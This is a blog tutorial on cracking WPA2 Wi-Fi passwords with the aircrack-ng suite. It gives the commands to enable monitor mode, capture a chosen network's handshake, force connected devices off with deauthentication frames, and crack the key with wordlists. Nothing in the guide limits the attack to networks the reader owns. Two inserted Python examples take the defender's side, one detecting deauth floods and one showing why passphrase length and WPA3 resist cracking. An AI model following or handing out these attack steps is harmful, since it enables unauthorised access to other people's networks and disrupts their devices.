Published Mar 11, 2021 by Logan O'Connell
This guide to hacking WPA2 networks assumes that you have an installation of Kali Linux running, either in a VM or on bare metal, or you have the aircrack-ng suite built on your computer, perhaps through Homebrew.
This guide will unfortunately not have images, although I may update it later with images, as I am currently without my external Wi-Fi card.
Oh! That reminds me. Make sure, if you are going through this tutorial, that you have an external Wi-Fi card or a built-in Wi-Fi chip that supports monitor mode. This is crucial for getting these commands to work correctly.
Alright, let’s get started.
In your terminal, type:
airmon-ng
This will yield a small table that shows the interface of your external Wi-Fi card, which should be something along the lines of wlan0 or wlan0mon.
In your terminal, type:
airmon-ng start [interface name]
This will set the card to monitor mode. Here comes the fun stuff.
In your terminal, type:
airodump-ng [interface name]
This will bring up an updating table, which will show the SSIDs of all surrounding Wi-Fi networks.
Once you see the Wi-Fi network you would like to target, feel free to CTRL + C out of there. Copy the BSSID and channel number (referred to as “CH”) of the Wi-Fi network you would like to target, and move to the next step.
In your terminal, type:
airodump-ng -c [channel number] --bssid [BSSID] -w /root/Desktop [interface name]
This will begin sniffing for handshakes between the Wi-Fi network and a device looking to connect to it. An updating table will pop up, and once a “WPA handshake” indicator appears, the handshake has been captured and the .pcap file containing the data has been saved using the /root/Desktop prefix given to -w (note that airodump-ng treats the -w argument as a filename prefix, so the capture is written as /root/Desktop-01.cap and similar rather than inside a Desktop folder).
Sometimes it can take a while for a handshake to appear, especially if it's a smaller network and devices are not joining too frequently. To combat this, we can attempt to deauth devices already on the network and force them to re-initiate a handshake. When “STATION” entries begin to populate the table from the last section’s command, we can run the command below to attempt to deauth the device.
In your terminal, type:
aireplay-ng -0 2 -a [BSSID] -c [STATION] [interface name]
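From the network owner's side, the burst of spoofed deauthentication frames that the command above sends is easy to spot, because a genuine access point sends at most a handful of deauth or disassociation frames and never a rapid stream of them. The script below is an added example, not part of the original guide or the aircrack-ng project: it parses raw 802.11 management frame headers, counts deauth/disassoc frames per BSSID in a sliding time window, and raises an alert when the count exceeds a threshold. The frames, MAC addresses and timestamps are constructed inline so it runs offline; in a real deployment the bytes would come from a monitor-mode capture file.

```python
"""Detect deauthentication floods in raw 802.11 management frames.

Added example, not part of the original guide: a defender-side check for
the burst of forged deauth frames described in the text. The frames below
are constructed test data so the script runs offline.
"""
import struct
from collections import defaultdict

DEAUTH = 12     # 802.11 management subtype 12 = Deauthentication
DISASSOC = 10   # 802.11 management subtype 10 = Disassociation
BEACON = 8      # 802.11 management subtype 8  = Beacon (benign, for contrast)


def _mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def _mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, reason=None) -> bytes:
    """Build a minimal 802.11 management frame (constructed test data)."""
    fc = subtype << 4                                    # protocol version 0, type 0 (management)
    header = (struct.pack("<H", fc) + b"\x00\x00"        # frame control, duration
              + _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid)
              + b"\x00\x00")                             # sequence control
    body = struct.pack("<H", reason) if reason is not None else b""   # deauth/disassoc reason code
    return header + body


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack("<H", frame[:2])[0]
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 0:                                       # deauth/disassoc are management frames only
        return None
    dst, src, bssid = _mac_str(frame[4:10]), _mac_str(frame[10:16]), _mac_str(frame[16:22])
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, dst, src, bssid, reason


def detect_deauth_floods(frames, window_s=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).

    Raises one alert per BSSID the first time more than `threshold`
    deauth/disassoc frames for that BSSID fall inside a sliding window of
    `window_s` seconds. A burst like that is the signature of forged deauths."""
    recent = defaultdict(list)   # bssid -> timestamps still inside the window
    alerted, alerts = set(), []
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        parsed = parse_mgmt_frame(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, dst, _src, bssid, reason = parsed
        times = recent[bssid]
        times.append(ts)
        while times and ts - times[0] > window_s:         # expire old timestamps
            times.pop(0)
        if len(times) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(times),
                           "station": dst, "reason": reason})
    return alerts


def sample_capture():
    """Constructed capture: a 10-frame deauth burst against one station,
    beacons from the same AP, and one lone deauth from a different AP."""
    ap, victim = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"
    frames = [(t / 10, build_mgmt_frame(DEAUTH, victim, ap, ap, reason=7))
              for t in range(10)]
    frames += [(float(t), build_mgmt_frame(BEACON, "ff:ff:ff:ff:ff:ff", ap, ap))
               for t in range(5)]
    frames.append((5.0, build_mgmt_frame(DEAUTH, victim, "de:ad:be:ef:00:01",
                                         "de:ad:be:ef:00:01", reason=3)))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_capture()):
        print(f"deauth flood: bssid={alert['bssid']} count={alert['count']} "
              f"station={alert['station']} reason={alert['reason']}")
```

The lone deauth from the second access point never trips the threshold, which is the point of the sliding window: ordinary disconnects are single frames, floods are not. The same frames are what 802.11w Protected Management Frames defend against; with PMF enabled on both the access point and the clients, unauthenticated deauth frames are discarded and the forcing trick described above stops working.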
Now that we have the .pcap file, we have the handshake ready to be cracked. From here, download a wordlist or use one of the ones built into Kali Linux already. Here is one specifically meant for WPA2 networks.
Then, type the following in your terminal to begin cracking the .pcap file:
aircrack-ng -a2 -b [BSSID] -w [path to wordlist] [path to .pcap file]
If the correct password is found, you should see a “KEY FOUND!” prompt in the middle of the terminal window. If it fails, keep trying other wordlists.
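The reason a wordlist can recover the key from a captured handshake at all is that WPA2-PSK derives its Pairwise Master Key from the passphrase and SSID alone, with a fixed, public key-derivation function, so every candidate can be checked offline and the only thing protecting the network is how many candidates an attacker has to try. The script below is an added example, not part of the original guide or the aircrack-ng project: it derives the PMK as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, salted with the SSID, 4096 iterations, 32-byte output), checks it against the published Annex H test vector, and compares the guess budget that different passphrase policies impose. The policy names, the 1e6 guesses/second figure and the benchmark routine are illustrative assumptions.

```python
"""Why a wordlist attack on a captured WPA2 handshake works, and what stops it.

Added example, not part of the original guide. Derives the WPA2-PSK
Pairwise Master Key per IEEE 802.11i and compares keyspace sizes; the
per-guess cost is the same for a wordlist entry and a random candidate,
so passphrase entropy is the whole defence.
"""
import hashlib
import math
import time


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096 iterations, 256 bits), per IEEE 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace_bits(length: int, alphabet_size: int) -> float:
    """Entropy in bits of a uniformly random passphrase of `length` symbols."""
    return length * math.log2(alphabet_size)


def expected_guesses(bits: float) -> float:
    """On average the key is found halfway through the keyspace."""
    return 2.0 ** (bits - 1)


def expected_seconds(bits: float, guesses_per_second: float) -> float:
    return expected_guesses(bits) / guesses_per_second


def measure_guess_rate(ssid: str = "example", samples: int = 50) -> float:
    """Rough single-core PBKDF2 throughput on this machine, in derivations per second
    (illustrative benchmark; the SSID and candidates are constructed)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i}", ssid)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print("PMK:", derive_pmk("password", "IEEE").hex())
    print(f"this machine: ~{measure_guess_rate():,.0f} PBKDF2 derivations/s on one core")
    # Assumed passphrase policies, compared at an assumed 1e6 guesses/s
    policies = [("8 lowercase letters", 8, 26),
                ("10 mixed-case + digits", 10, 62),
                ("20 mixed-case + digits", 20, 62)]
    for name, length, alphabet in policies:
        bits = keyspace_bits(length, alphabet)
        years = expected_seconds(bits, 1e6) / (365 * 24 * 3600)
        print(f"{name:24s} {bits:6.1f} bits  ~{years:.3g} years at 1e6 guesses/s")
```

Two things the numbers make plain: the 4096 PBKDF2 iterations only slow each guess by a constant factor, so an eight-letter lowercase passphrase is a matter of days even on modest hardware, while a 20-character random one is out of reach regardless of wordlist. The structural fix is WPA3, whose SAE handshake does not let a captured exchange be used for offline guessing; on WPA2 the only lever the owner has is a long random passphrase that will not appear in any wordlist.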
That’s all!